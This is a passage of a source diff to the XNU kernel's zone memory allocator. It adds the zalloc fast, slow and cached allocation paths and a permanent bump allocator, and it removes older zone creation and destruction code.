+ * @function zalloc_import
+ *
+ * @brief
+ * Import @c n elements in the specified array, opposite of @c zfree_drop().
+ *
+ * @param zone          The zone to import elements from
+ * @param elems         The array to import into
+ * @param n             The number of elements to import. Must be non zero,
+ *                      and smaller than @c zone->z_elems_free.
+ */
+__header_always_inline void
+zalloc_import(zone_t zone, zone_element_t *elems, uint32_t n)
 {
-       vm_size_t alloc;
-       vm_size_t redzone;
-       zone_t z;
+       vm_size_t esize = zone_elem_size(zone);
+       uint32_t i = 0;
 
-       if (size > ZONE_MAX_ALLOC_SIZE) {
-               panic("zone_create: element size too large: %zd", (size_t)size);
-       }
+       assertf(STAILQ_EMPTY(&zone->z_recirc),
+           "Trying to import from zone %p [%s%s] with non empty recirc",
+           zone, zone_heap_name(zone), zone_name(zone));
 
-       size = zone_elem_adjust_size(name, size, flags, &redzone);
-       /*
-        * Allocate the zone slot, return early if we found an older match.
-        */
-       z = zone_create_find(name, size, flags, desired_zid);
-       if (__improbable(z->z_self)) {
-               /* We found a zone to reuse */
-               return z;
-       }
+       do {
+               vm_offset_t page, eidx, size = 0;
+               struct zone_page_metadata *meta;
+
+               if (!zone_pva_is_null(zone->z_pageq_partial)) {
+                       meta = zone_pva_to_meta(zone->z_pageq_partial);
+                       page = zone_pva_to_addr(zone->z_pageq_partial);
+               } else if (!zone_pva_is_null(zone->z_pageq_empty)) {
+                       meta = zone_pva_to_meta(zone->z_pageq_empty);
+                       page = zone_pva_to_addr(zone->z_pageq_empty);
+                       zone_counter_sub(zone, z_wired_empty, meta->zm_chunk_len);
+               } else {
+                       zone_accounting_panic(zone, "z_elems_free corruption");
+               }
 
-       /*
-        * Initialize the zone properly.
-        */
+               if (!zone_has_index(zone, meta->zm_index)) {
+                       zone_page_metadata_index_confusion_panic(zone, page, meta);
+               }
 
-       /*
-        * If the kernel is post lockdown, copy the zone name passed in.
-        * Else simply maintain a pointer to the name string as it can only
-        * be a core XNU zone (no unloadable kext exists before lockdown).
-        */
-       if (startup_phase >= STARTUP_SUB_LOCKDOWN) {
-               size_t nsz = MIN(strlen(name) + 1, MACH_ZONE_NAME_MAX_LEN);
-               char *buf = zalloc_permanent(nsz, ZALIGN_NONE);
-               strlcpy(buf, name, nsz);
-               z->z_name = buf;
+               vm_offset_t old_size = meta->zm_alloc_size;
+               vm_offset_t max_size = ptoa(meta->zm_chunk_len) + ZM_ALLOC_SIZE_LOCK;
+
+               do {
+                       eidx = zone_meta_find_and_clear_bit(zone, meta);
+                       elems[i++] = zone_element_encode(page, eidx, ZPM_AUTO);
+                       size += esize;
+               } while (i < n && old_size + size + esize <= max_size);
+
+               vm_offset_t new_size = zone_meta_alloc_size_add(zone, meta, size);
+
+               if (new_size + esize > max_size) {
+                       zone_meta_requeue(zone, &zone->z_pageq_full, meta);
+               } else if (old_size == 0) {
+                       /* remove from free, move to intermediate */
+                       zone_meta_requeue(zone, &zone->z_pageq_partial, meta);
+               }
+       } while (i < n);
+}
+
+/*!
+ * @function zalloc_return
+ *
+ * @brief
+ * Performs the tail-end of the work required on allocations before the caller
+ * uses them.
+ *
+ * @discussion
+ * This function is called without any zone lock held,
+ * and with preemption restored to the state it had when @c zalloc_ext() was called.
+ *
+ * @param zone          The zone we're allocating from.
+ * @param ze            The encoded element we just allocated.
+ * @param flags         The flags passed to @c zalloc_ext() (for Z_ZERO).
+ * @param elem_size     The element size for this zone.
+ * @param freemag       An optional magazine that needs to be freed.
+ */
+__attribute__((noinline))
+static void *
+zalloc_return(zone_t zone, zone_element_t ze, zalloc_flags_t flags,
+    vm_offset_t elem_size, zone_magazine_t freemag)
+{
+       vm_offset_t addr = zone_element_addr(ze, elem_size);
+
+#if KASAN_ZALLOC
+       if (zone->z_percpu) {
+               zpercpu_foreach_cpu(i) {
+                       kasan_poison_range(addr + ptoa(i), elem_size,
+                           ASAN_VALID);
+               }
        } else {
-               z->z_name = name;
+               kasan_poison_range(addr, elem_size, ASAN_VALID);
+       }
+#endif
+#if ZALLOC_ENABLE_POISONING
+       zalloc_validate_element(zone, addr, elem_size, zone_element_prot(ze));
+#endif /* ZALLOC_ENABLE_POISONING */
+#if ZONE_ENABLE_LOGGING || CONFIG_ZLEAKS
+       if (__improbable(zalloc_should_log_or_trace_leaks(zone, elem_size))) {
+               zalloc_log_or_trace_leaks(zone, addr, __builtin_frame_address(0));
+       }
+#endif /* ZONE_ENABLE_LOGGING || CONFIG_ZLEAKS */
+#if KASAN_ZALLOC
+       if (zone->z_kasan_redzone) {
+               addr = kasan_alloc(addr, elem_size,
+                   elem_size - 2 * zone->z_kasan_redzone,
+                   zone->z_kasan_redzone);
+               elem_size -= 2 * zone->z_kasan_redzone;
        }
        /*
-        * If zone_init() hasn't run yet, the permanent zones do not exist.
-        * We can limp along without properly initialized stats for a while,
-        * zone_init() will rebuild the missing stats when it runs.
+        * Initialize buffer with unique pattern only if memory
+        * wasn't expected to be zeroed.
         */
-       if (__probable(zone_array[ZONE_ID_PERCPU_PERMANENT].z_self)) {
-               z->z_stats = zalloc_percpu_permanent_type(struct zone_stats);
+       if (!zone->z_free_zeroes && !(flags & Z_ZERO)) {
+               kasan_leak_init(addr, elem_size);
+       }
+#endif /* KASAN_ZALLOC */
+       if ((flags & Z_ZERO) && !zone->z_free_zeroes) {
+               bzero((void *)addr, elem_size);
        }
 
-       alloc = zone_get_min_alloc_granule(size, flags);
-
-       if (flags & ZC_KALLOC_HEAP) {
-               size_t rem = (alloc % size) / (alloc / size);
+#if VM_MAX_TAG_ZONES
+       if (__improbable(zone->tags)) {
+               vm_tag_t tag = zalloc_flags_get_tag(flags);
+               if (tag == VM_KERN_MEMORY_NONE) {
+                       tag = VM_KERN_MEMORY_KALLOC;
+               }
+               // set the tag with b0 clear so the block remains inuse
+               *ztSlot(zone, addr) = (vm_tag_t)(tag << 1);
+               vm_tag_update_zone_size(tag, zone->tag_zone_index,
+                   (long)elem_size);
+       }
+#endif /* VM_MAX_TAG_ZONES */
 
-               /*
-                * Try to grow the elements size and spread them more if the remaining
-                * space is large enough.
-                */
-               size += rem & ~(KALLOC_MINALIGN - 1);
+       TRACE_MACHLEAKS(ZALLOC_CODE, ZALLOC_CODE_2, elem_size, addr);
+       DTRACE_VM2(zalloc, zone_t, zone, void*, addr);
+       if (freemag) {
+               zone_magazine_free(freemag);
        }
+       return (void *)addr;
+}
 
-       z->pcpu_elem_size = z->z_elem_size = (uint16_t)size;
-       z->alloc_pages = (uint16_t)atop(alloc);
-#if KASAN_ZALLOC
-       z->kasan_redzone = redzone;
-       if (strncmp(name, "fakestack.", sizeof("fakestack.") - 1) == 0) {
-               z->kasan_fakestacks = true;
+#if CONFIG_GZALLOC
+/*!
+ * @function zalloc_gz
+ *
+ * @brief
+ * Performs allocations for zones using gzalloc.
+ *
+ * @discussion
+ * This function is noinline so that it doesn't affect the codegen
+ * of the fastpath.
+ */
+__attribute__((noinline))
+static void *
+zalloc_gz(zone_t zone, zone_stats_t zstats, zalloc_flags_t flags)
+{
+       vm_offset_t addr = gzalloc_alloc(zone, zstats, flags);
+       return zalloc_return(zone, zone_element_encode(addr, 0, ZPM_AUTO),
+                  flags, zone_elem_size(zone), NULL);
+}
+#endif /* CONFIG_GZALLOC */
+
+static void *
+zalloc_item_fast(zone_t zone, zone_stats_t zstats, zalloc_flags_t flags)
+{
+       vm_size_t esize = zone_elem_size(zone);
+       zone_element_t ze;
+
+       zalloc_import(zone, &ze, 1);
+       zone_elems_free_sub(zone, 1);
+       zpercpu_get(zstats)->zs_mem_allocated += esize;
+       zone_unlock(zone);
+
+       return zalloc_return(zone, ze, flags, esize, NULL);
+}
+
+/*!
+ * @function zalloc_item_slow
+ *
+ * @brief
+ * Performs allocations when the zone is out of elements.
+ *
+ * @discussion
+ * This function might drop the lock and reenable preemption,
+ * which means the per-CPU caching layer or recirculation depot
+ * might have received elements.
+ */
+__attribute__((noinline))
+static void *
+zalloc_item_slow(zone_t zone, zone_stats_t zstats, zalloc_flags_t flags)
+{
+       if (zone->z_replenishes) {
+               zone_replenish_locked(zone);
+       } else {
+               if ((flags & Z_NOWAIT) == 0) {
+                       zone_expand_locked(zone, flags, zalloc_needs_refill);
+               }
+               if (flags & (Z_NOWAIT | Z_NOPAGEWAIT)) {
+                       zone_expand_async_schedule_if_needed(zone);
+               }
+               if (__improbable(zone->z_elems_free == 0)) {
+                       zone_unlock(zone);
+                       if (__improbable(flags & Z_NOFAIL)) {
+                               zone_nofail_panic(zone);
+                       }
+                       DTRACE_VM2(zalloc, zone_t, zone, void*, NULL);
+                       return NULL;
+               }
        }
-#endif
 
        /*
-        * Handle KPI flags
+        * We might have changed core or got preempted/blocked while expanding
+        * the zone. Allocating from the zone when the recirculation depot
+        * is not empty is not allowed.
+        *
+        * It will be rare but possible for the depot to refill while we were
+        * waiting for pages. If that happens we need to start over.
         */
-#if __LP64__
-       if (flags & ZC_SEQUESTER) {
-               z->va_sequester = true;
+       if (!STAILQ_EMPTY(&zone->z_recirc)) {
+               zone_unlock(zone);
+               return zalloc_ext(zone, zstats, flags);
        }
-#endif
-       /* ZC_CACHING applied after all configuration is done */
 
-       if (flags & ZC_PERCPU) {
-               /*
-                * ZC_CACHING is disallowed because it uses per-cpu zones for its
-                * implementation and it would be circular. These allocations are
-                * also quite expensive, so caching feels dangerous memory wise too.
-                *
-                * ZC_ZFREE_CLEARMEM is forced because per-cpu zones allow for
-                * pointer-sized allocations which poisoning doesn't support.
-                */
-               zone_create_assert_not_both(name, flags, ZC_PERCPU, ZC_CACHING);
-               zone_create_assert_not_both(name, flags, ZC_PERCPU, ZC_ALLOW_FOREIGN);
-               z->percpu = true;
-               z->gzalloc_exempt = true;
-               z->zfree_clear_mem = true;
-               z->pcpu_elem_size *= zpercpu_count();
-       }
-       if (flags & ZC_ZFREE_CLEARMEM) {
-               z->zfree_clear_mem = true;
-       }
-       if (flags & ZC_NOGC) {
-               z->collectable = false;
-       }
-       if (flags & ZC_NOENCRYPT) {
-               z->noencrypt = true;
-       }
-       if (flags & ZC_ALIGNMENT_REQUIRED) {
-               z->alignment_required = true;
-       }
-       if (flags & ZC_NOGZALLOC) {
-               z->gzalloc_exempt = true;
-       }
-       if (flags & ZC_NOCALLOUT) {
-               z->no_callout = true;
-       }
-       if (flags & ZC_DESTRUCTIBLE) {
-               zone_create_assert_not_both(name, flags, ZC_DESTRUCTIBLE, ZC_CACHING);
-               zone_create_assert_not_both(name, flags, ZC_DESTRUCTIBLE, ZC_ALLOW_FOREIGN);
-               z->destructible = true;
-       }
+       return zalloc_item_fast(zone, zstats, flags);
+}
+
+/*!
+ * @function zalloc_item
+ *
+ * @brief
+ * Performs allocations when zone caching is off.
+ *
+ * @discussion
+ * This function calls @c zalloc_item_slow() when refilling the zone
+ * is needed, or @c zalloc_item_fast() if the zone has enough free elements.
+ */
+static void *
+zalloc_item(zone_t zone, zone_stats_t zstats, zalloc_flags_t flags)
+{
+       zone_lock_check_contention(zone, NULL);
 
        /*
-        * Handle Internal flags
+        * When we committed to the zalloc_item() path,
+        * zone caching might have been flipped/enabled.
+        *
+        * If we got preempted for long enough, the recirculation layer
+        * can have been populated, and allocating from the zone would be
+        * incorrect.
+        *
+        * So double check for this extremely rare race here.
         */
-       if (flags & ZC_ALLOW_FOREIGN) {
-               z->allows_foreign = true;
+       if (__improbable(!STAILQ_EMPTY(&zone->z_recirc))) {
+               zone_unlock(zone);
+               return zalloc_ext(zone, zstats, flags);
        }
-       if ((ZSECURITY_OPTIONS_SUBMAP_USER_DATA & zsecurity_options) &&
-           (flags & ZC_DATA_BUFFERS)) {
-               z->submap_idx = Z_SUBMAP_IDX_BAG_OF_BYTES_MAP;
+
+       if (__improbable(zone->z_elems_free <= zone->z_elems_rsv)) {
+               return zalloc_item_slow(zone, zstats, flags);
        }
-       if (flags & ZC_KASAN_NOQUARANTINE) {
-               z->kasan_noquarantine = true;
+
+       return zalloc_item_fast(zone, zstats, flags);
+}
+
+static void *
+zalloc_cached_fast(zone_t zone, zone_stats_t zstats, zalloc_flags_t flags,
+    zone_cache_t cache, zone_magazine_t freemag)
+{
+       vm_offset_t esize = zone_elem_size(zone);
+       zone_element_t ze;
+       uint32_t index;
+
+       index = --cache->zc_alloc_cur;
+       if (index >= zc_mag_size()) {
+               zone_accounting_panic(zone, "zc_alloc_cur wrap around");
        }
-       /* ZC_KASAN_NOREDZONE already handled */
+       ze = cache->zc_alloc_elems[index];
+       cache->zc_alloc_elems[index].ze_value = 0;
 
-       /*
-        * Then if there's extra tuning, do it
-        */
-       if (extra_setup) {
-               extra_setup(z);
+       zpercpu_get(zstats)->zs_mem_allocated += esize;
+       enable_preemption();
+
+       if (zone_meta_is_free(zone_meta_from_element(ze), ze)) {
+               zone_meta_double_free_panic(zone, ze, __func__);
        }
 
-       /*
-        * Configure debugging features
-        */
-#if CONFIG_GZALLOC
-       gzalloc_zone_init(z); /* might set z->gzalloc_tracked */
-#endif
-#if ZONE_ENABLE_LOGGING
-       if (!z->gzalloc_tracked && num_zones_logged < max_num_zones_to_log) {
-               /*
-                * Check for and set up zone leak detection if requested via boot-args.
-                * might set z->zone_logging
-                */
-               zone_setup_logging(z);
+       return zalloc_return(zone, ze, flags, esize, freemag);
+}
+
+static void *
+zalloc_cached_from_depot(zone_t zone, zone_stats_t zstats, zalloc_flags_t flags,
+    zone_cache_t cache, zone_cache_t depot, zone_magazine_t mag)
+{
+       STAILQ_REMOVE_HEAD(&depot->zc_depot, zm_link);
+       if (depot->zc_depot_cur-- == 0) {
+               zone_accounting_panic(zone, "zc_depot_cur wrap-around");
        }
-#endif /* ZONE_ENABLE_LOGGING */
-#if VM_MAX_TAG_ZONES
-       if (!z->gzalloc_tracked && z->kalloc_heap && zone_tagging_on) {
-               static int tag_zone_index;
-               vm_offset_t esize = zone_elem_size(z);
-               z->tags = true;
-               z->tags_inline = (((page_size + esize - 1) / esize) <=
-                   (sizeof(uint32_t) / sizeof(uint16_t)));
-               z->tag_zone_index = os_atomic_inc_orig(&tag_zone_index, relaxed);
-               assert(z->tag_zone_index < VM_MAX_TAG_ZONES);
+       zone_depot_unlock_nopreempt(depot);
+
+       mag = zone_magazine_replace(&cache->zc_alloc_cur,
+           &cache->zc_alloc_elems, mag);
+
+       z_debug_assert(cache->zc_alloc_cur == zc_mag_size());
+       z_debug_assert(mag->zm_cur == 0);
+
+       if (zone == zc_magazine_zone) {
+               enable_preemption();
+               bzero(mag, zone_elem_size(zone));
+               return mag;
        }
-#endif
+
+       return zalloc_cached_fast(zone, zstats, flags, cache, mag);
+}
+
+__attribute__((noinline))
+static void *
+zalloc_cached_slow(zone_t zone, zone_stats_t zstats, zalloc_flags_t flags,
+    zone_cache_t cache)
+{
+       zone_magazine_t mag = NULL;
+       struct zone_depot mags = STAILQ_HEAD_INITIALIZER(mags);
 
        /*
-        * Finally, fixup properties based on security policies, boot-args, ...
+        * Try to allocate from our local depot, if there's one.
         */
-       if ((ZSECURITY_OPTIONS_SUBMAP_USER_DATA & zsecurity_options) &&
-           z->kalloc_heap == KHEAP_ID_DATA_BUFFERS) {
-               z->submap_idx = Z_SUBMAP_IDX_BAG_OF_BYTES_MAP;
-       }
-#if __LP64__
-       if ((ZSECURITY_OPTIONS_SEQUESTER & zsecurity_options) &&
-           (flags & ZC_NOSEQUESTER) == 0 &&
-           z->submap_idx == Z_SUBMAP_IDX_GENERAL_MAP) {
-               z->va_sequester = true;
+       if (STAILQ_FIRST(&cache->zc_depot)) {
+               zone_depot_lock_nopreempt(cache);
+
+               if ((mag = STAILQ_FIRST(&cache->zc_depot)) != NULL) {
+                       return zalloc_cached_from_depot(zone, zstats, flags,
+                                  cache, cache, mag);
+               }
+
+               zone_depot_unlock_nopreempt(cache);
        }
-#endif
+
+       zone_lock_nopreempt_check_contention(zone, cache);
+
        /*
-        * Always clear zone elements smaller than a cacheline,
-        * because it's pretty close to free.
+        * If the recirculation depot is empty, we'll need to import.
+        * The system is tuned for this to be extremely rare.
         */
-       if (size <= zp_min_size) {
-               z->zfree_clear_mem = true;
-       }
-       if (zp_factor != 0 && !z->zfree_clear_mem) {
-               z->zp_count = zone_poison_count_init(z);
-       }
+       if (__improbable(STAILQ_EMPTY(&zone->z_recirc))) {
+               uint16_t n_elems = zc_mag_size();
 
-#if CONFIG_ZCACHE
-       if ((flags & ZC_NOCACHING) == 0) {
-               /*
-                * Append kalloc heap name to zone name (if zone is used by kalloc)
-                */
-               char temp_zone_name[MAX_ZONE_NAME] = "";
-               snprintf(temp_zone_name, MAX_ZONE_NAME, "%s%s", zone_heap_name(z), z->z_name);
+               if (zone->z_elems_free < n_elems + zone->z_elems_rsv / 2 &&
+                   os_sub_overflow(zone->z_elems_free,
+                   zone->z_elems_rsv / 2, &n_elems)) {
+                       n_elems = 0;
+               }
 
-               /* Check if boot-arg specified it should have a cache */
-               if (track_this_zone(temp_zone_name, cache_zone_name)) {
-                       flags |= ZC_CACHING;
-               } else if (zcc_kalloc && z->kalloc_heap) {
-                       flags |= ZC_CACHING;
+               z_debug_assert(n_elems <= zc_mag_size());
+
+               if (__improbable(n_elems == 0)) {
+                       /*
+                        * If importing elements would deplete the zone,
+                        * call zalloc_item_slow()
+                        */
+                       return zalloc_item_slow(zone, zstats, flags);
                }
+
+               if (__improbable(zone_caching_disabled)) {
+                       if (__improbable(zone_caching_disabled < 0)) {
+                               /*
+                                * In the first 10s after boot, mess with
+                                * the scan position in order to make early
+                                * allocation patterns less predictable.
+                                */
+                               zone_early_scramble_rr(zone, zstats);
+                       }
+                       return zalloc_item_fast(zone, zstats, flags);
+               }
+
+               zalloc_import(zone, cache->zc_alloc_elems, n_elems);
+
+               cache->zc_alloc_cur = n_elems;
+               zone_elems_free_sub(zone, n_elems);
+
+               zone_unlock_nopreempt(zone);
+
+               return zalloc_cached_fast(zone, zstats, flags, cache, NULL);
        }
-       if ((flags & ZC_CACHING) &&
-           !z->tags && !z->zone_logging && !z->gzalloc_tracked) {
-               zcache_init(z);
-       }
-#endif /* CONFIG_ZCACHE */
 
-       lock_zone(z);
-       z->z_self = z;
-       unlock_zone(z);
+       uint16_t n_mags = 0;
 
-       return z;
+       /*
+        * If the recirculation depot has elements, then try to fill
+        * the local per-cpu depot to (1 / zc_recirc_denom)
+        */
+       do {
+               mag = STAILQ_FIRST(&zone->z_recirc);
+               STAILQ_REMOVE_HEAD(&zone->z_recirc, zm_link);
+               STAILQ_INSERT_TAIL(&mags, mag, zm_link);
+               n_mags++;
+
+               for (uint16_t i = 0; i < zc_mag_size(); i++) {
+                       zone_element_t e = mag->zm_elems[i];
+
+                       if (!zone_meta_mark_used(zone_meta_from_element(e), e)) {
+                               zone_meta_double_free_panic(zone, e, __func__);
+                       }
+               }
+       } while (!STAILQ_EMPTY(&zone->z_recirc) &&
+           zc_recirc_denom * n_mags * zc_mag_size() <= cache->zc_depot_max);
+
+       zone_elems_free_sub(zone, n_mags * zc_mag_size());
+       zone_counter_sub(zone, z_recirc_cur, n_mags);
+
+       zone_unlock_nopreempt(zone);
+
+       /*
+        * And then incorporate everything into our per-cpu layer.
+        */
+       mag = STAILQ_FIRST(&mags);
+       STAILQ_REMOVE_HEAD(&mags, zm_link);
+       mag = zone_magazine_replace(&cache->zc_alloc_cur,
+           &cache->zc_alloc_elems, mag);
+       z_debug_assert(cache->zc_alloc_cur == zc_mag_size());
+       z_debug_assert(mag->zm_cur == 0);
+
+       if (--n_mags > 0) {
+               zone_depot_lock_nopreempt(cache);
+               cache->zc_depot_cur += n_mags;
+               STAILQ_CONCAT(&cache->zc_depot, &mags);
+               zone_depot_unlock_nopreempt(cache);
+       }
+
+       return zalloc_cached_fast(zone, zstats, flags, cache, mag);
 }
 
-__startup_func
-void
-zone_create_startup(struct zone_create_startup_spec *spec)
+/*!
+ * @function zalloc_cached
+ *
+ * @brief
+ * Performs allocations when zone caching is on.
+ *
+ * @discussion
+ * This function calls @c zalloc_cached_fast() when the caches have elements
+ * ready.
+ *
+ * Else it will call @c zalloc_cached_slow() so that the cache is refilled,
+ * which might switch to the @c zalloc_item_slow() track when the backing zone
+ * needs to be refilled.
+ */
+static void *
+zalloc_cached(zone_t zone, zone_stats_t zstats, zalloc_flags_t flags)
 {
-       *spec->z_var = zone_create_ext(spec->z_name, spec->z_size,
-           spec->z_flags, spec->z_zid, spec->z_setup);
+       zone_cache_t cache;
+
+       disable_preemption();
+       cache = zpercpu_get(zone->z_pcpu_cache);
+
+       if (cache->zc_alloc_cur == 0) {
+               if (__improbable(cache->zc_free_cur == 0)) {
+                       return zalloc_cached_slow(zone, zstats, flags, cache);
+               }
+               zone_cache_swap_magazines(cache);
+       }
+
+       return zalloc_cached_fast(zone, zstats, flags, cache, NULL);
 }
 
-/*
- * The 4 first field of a zone_view and a zone alias, so that the zone_or_view_t
- * union works. trust but verify.
+/*!
+ * @function zalloc_ext
+ *
+ * @brief
+ * The core implementation of @c zalloc(), @c zalloc_flags(), @c zalloc_percpu().
  */
-#define zalloc_check_zov_alias(f1, f2) \
-    static_assert(offsetof(struct zone, f1) == offsetof(struct zone_view, f2))
-zalloc_check_zov_alias(z_self, zv_zone);
-zalloc_check_zov_alias(z_stats, zv_stats);
-zalloc_check_zov_alias(z_name, zv_name);
-zalloc_check_zov_alias(z_views, zv_next);
-#undef zalloc_check_zov_alias
-
-__startup_func
-void
-zone_view_startup_init(struct zone_view_startup_spec *spec)
+void *
+zalloc_ext(zone_t zone, zone_stats_t zstats, zalloc_flags_t flags)
 {
-       struct kalloc_heap *heap = NULL;
-       zone_view_t zv = spec->zv_view;
-       zone_t z;
+       /*
+        * KASan uses zalloc() for fakestack, which can be called anywhere.
+        * However, we make sure these calls can never block.
+        */
+       assert(zone->kasan_fakestacks ||
+           ml_get_interrupts_enabled() ||
+           ml_is_quiescing() ||
+           debug_mode_active() ||
+           startup_phase < STARTUP_SUB_EARLY_BOOT);
 
-       switch (spec->zv_heapid) {
-       case KHEAP_ID_DEFAULT:
-               heap = KHEAP_DEFAULT;
-               break;
-       case KHEAP_ID_DATA_BUFFERS:
-               heap = KHEAP_DATA_BUFFERS;
-               break;
-       case KHEAP_ID_KEXT:
-               heap = KHEAP_KEXT;
-               break;
-       default:
-               heap = NULL;
+       /*
+        * Make sure Z_NOFAIL was not obviously misused
+        */
+       if (zone->z_replenishes) {
+               assert((flags & (Z_NOWAIT | Z_NOPAGEWAIT)) == 0);
+       } else if (flags & Z_NOFAIL) {
+               assert(!zone->exhaustible &&
+                   (flags & (Z_NOWAIT | Z_NOPAGEWAIT)) == 0);
        }
 
-       if (heap) {
-               z = kalloc_heap_zone_for_size(heap, spec->zv_size);
-               assert(z);
-       } else {
-               z = spec->zv_zone;
-               assert(spec->zv_size <= zone_elem_size(z));
+#if CONFIG_GZALLOC
+       if (__improbable(zone->gzalloc_tracked)) {
+               return zalloc_gz(zone, zstats, flags);
        }
+#endif /* CONFIG_GZALLOC */
 
-       zv->zv_zone  = z;
-       zv->zv_stats = zalloc_percpu_permanent_type(struct zone_stats);
-       zv->zv_next  = z->z_views;
-       if (z->z_views == NULL && z->kalloc_heap == KHEAP_ID_NONE) {
-               /*
-                * count the raw view for zones not in a heap,
-                * kalloc_heap_init() already counts it for its members.
-                */
-               zone_view_count += 2;
-       } else {
-               zone_view_count += 1;
+       if (zone->z_pcpu_cache) {
+               return zalloc_cached(zone, zstats, flags);
        }
-       z->z_views = zv;
+
+       return zalloc_item(zone, zstats, flags);
 }
 
-zone_t
-zone_create(
-       const char             *name,
-       vm_size_t               size,
-       zone_create_flags_t     flags)
+void *
+zalloc(union zone_or_view zov)
 {
-       return zone_create_ext(name, size, flags, ZONE_ID_ANY, NULL);
+       return zalloc_flags(zov, Z_WAITOK);
 }
 
-zone_t
-zinit(
-       vm_size_t       size,           /* the size of an element */
-       vm_size_t       max,            /* maximum memory to use */
-       vm_size_t       alloc __unused, /* allocation size */
-       const char      *name)          /* a name for the zone */
+void *
+zalloc_noblock(union zone_or_view zov)
+{
+       return zalloc_flags(zov, Z_NOWAIT);
+}
+
+void *
+zalloc_flags(union zone_or_view zov, zalloc_flags_t flags)
 {
-       zone_t z = zone_create(name, size, ZC_DESTRUCTIBLE);
-       zone_set_max(z, max);
-       return z;
+       zone_t zone = zov.zov_view->zv_zone;
+       zone_stats_t zstats = zov.zov_view->zv_stats;
+       assert(!zone->z_percpu);
+       return zalloc_ext(zone, zstats, flags);
 }
 
-void
-zdestroy(zone_t z)
+void *
+zalloc_percpu(union zone_or_view zov, zalloc_flags_t flags)
 {
-       unsigned int zindex = zone_index(z);
+       zone_t zone = zov.zov_view->zv_zone;
+       zone_stats_t zstats = zov.zov_view->zv_stats;
+       assert(zone->z_percpu);
+       return (void *)__zpcpu_mangle(zalloc_ext(zone, zstats, flags));
+}
 
-       lock_zone(z);
+static void *
+_zalloc_permanent(zone_t zone, vm_size_t size, vm_offset_t mask)
+{
+       struct zone_page_metadata *page_meta;
+       vm_offset_t offs, addr;
+       zone_pva_t pva;
 
-       if (!z->destructible || zone_caching_enabled(z) || z->allows_foreign) {
-               panic("zdestroy: Zone %s%s isn't destructible",
-                   zone_heap_name(z), z->z_name);
-       }
+       assert(ml_get_interrupts_enabled() ||
+           ml_is_quiescing() ||
+           debug_mode_active() ||
+           startup_phase < STARTUP_SUB_EARLY_BOOT);
 
-       if (!z->z_self || z->expanding_no_vm_priv || z->expanding_vm_priv ||
-           z->async_pending || z->waiting) {
-               panic("zdestroy: Zone %s%s in an invalid state for destruction",
-                   zone_heap_name(z), z->z_name);
-       }
+       size = (size + mask) & ~mask;
+       assert(size <= PAGE_SIZE);
 
-#if !KASAN_ZALLOC
-       /*
-        * Unset the valid bit. We'll hit an assert failure on further operations
-        * on this zone, until zinit() is called again.
-        *
-        * Leave the zone valid for KASan as we will see zfree's on quarantined free
-        * elements even after the zone is destroyed.
-        */
-       z->z_self = NULL;
-#endif
-       z->destroyed = true;
-       unlock_zone(z);
+       zone_lock(zone);
+       assert(zone->z_self == zone);
 
-       /* Dump all the free elements */
-       zone_drop_free_elements(z);
+       for (;;) {
+               pva = zone->z_pageq_partial;
+               while (!zone_pva_is_null(pva)) {
+                       page_meta = zone_pva_to_meta(pva);
+                       if (page_meta->zm_bump + size <= PAGE_SIZE) {
+                               goto found;
+                       }
+                       pva = page_meta->zm_page_next;
+               }
 
-#if CONFIG_GZALLOC
-       if (__improbable(z->gzalloc_tracked)) {
-               /* If the zone is gzalloc managed dump all the elements in the free cache */
-               gzalloc_empty_free_cache(z);
+               zone_expand_locked(zone, Z_WAITOK, NULL);
        }
-#endif
-
-       lock_zone(z);
 
-       while (!zone_pva_is_null(z->pages_sequester)) {
-               struct zone_page_metadata *page_meta;
-               vm_offset_t                free_addr;
-
-               page_meta = zone_sequestered_page_get(z, &free_addr);
-               unlock_zone(z);
-               kmem_free(submap_for_zone(z), free_addr, ptoa(z->alloc_pages));
-               lock_zone(z);
-       }
+found:
+       offs = (uint16_t)((page_meta->zm_bump + mask) & ~mask);
+       page_meta->zm_bump = (uint16_t)(offs + size);
+       page_meta->zm_alloc_size += size;
+       zone->z_elems_free -= size;
+       zpercpu_get(zone->z_stats)->zs_mem_allocated += size;
 
-#if !KASAN_ZALLOC
-       /* Assert that all counts are zero */
-       if (z->countavail || z->countfree || zone_size_wired(z) ||
-           z->allfree_page_count || z->sequester_page_count) {
-               panic("zdestroy: Zone %s%s isn't empty at zdestroy() time",
-                   zone_heap_name(z), z->z_name);
+       if (page_meta->zm_alloc_size >= PAGE_SIZE - sizeof(vm_offset_t)) {
+               zone_meta_requeue(zone, &zone->z_pageq_full, page_meta);
        }
 
-       /* consistency check: make sure everything is indeed empty */
-       assert(zone_pva_is_null(z->pages_any_free_foreign));
-       assert(zone_pva_is_null(z->pages_all_used_foreign));
-       assert(zone_pva_is_null(z->pages_all_free));
-       assert(zone_pva_is_null(z->pages_intermediate));
-       assert(zone_pva_is_null(z->pages_all_used));
-       assert(zone_pva_is_null(z->pages_sequester));
-#endif
-
-       unlock_zone(z);
-
-       simple_lock(&all_zones_lock, &zone_locks_grp);
+       zone_unlock(zone);
 
-       assert(!bitmap_test(zone_destroyed_bitmap, zindex));
-       /* Mark the zone as empty in the bitmap */
-       bitmap_set(zone_destroyed_bitmap, zindex);
-       num_zones_in_use--;
-       assert(num_zones_in_use > 0);
+       addr = offs + zone_pva_to_addr(pva);
 
-       simple_unlock(&all_zones_lock);
+       DTRACE_VM2(zalloc, zone_t, zone, void*, addr);
+       return (void *)addr;
 }
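+
+/*
+ * _zalloc_permanent() above is a simple bump allocator: the request is
+ * rounded up to its alignment mask, carved out of the first partial chunk
+ * whose zm_bump offset still has room (growing the zone if none does),
+ * and is never returned.  A chunk retires to z_pageq_full once its
+ * accounted allocations come within sizeof(vm_offset_t) of PAGE_SIZE.
+ */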
 
-#pragma mark zone (re)fill, jetsam
-
-/*
- * Dealing with zone allocations from the mach VM code.
- *
- * The implementation of the mach VM itself uses the zone allocator
- * for things like the vm_map_entry data structure. In order to prevent
- * an infinite recursion problem when adding more pages to a zone, zalloc
- * uses a replenish thread to refill the VM layer's zones before they have
- * too few remaining free entries. The reserved remaining free entries
- * guarantee that the VM routines can get entries from already mapped pages.
- *
- * In order for that to work, the number of allocations in the nested
- * case has to be bounded. There are currently 2 replenish zones, and
- * if each needs 1 element of each zone to add a new page to itself, that
- * gives us a minimum reserve of 2 elements.
- *
- * There is also a deadlock issue with the zone garbage collection thread,
- * or any thread that is trying to free zone pages. While holding
- * the kernel's map lock they may need to allocate new VM map entries, hence
- * we need enough reserve to allow them to get past the point of holding the
- * map lock. After freeing that page, the GC thread will wait in drop_free_elements()
- * until the replenish threads can finish. Since there's only 1 GC thread at a time,
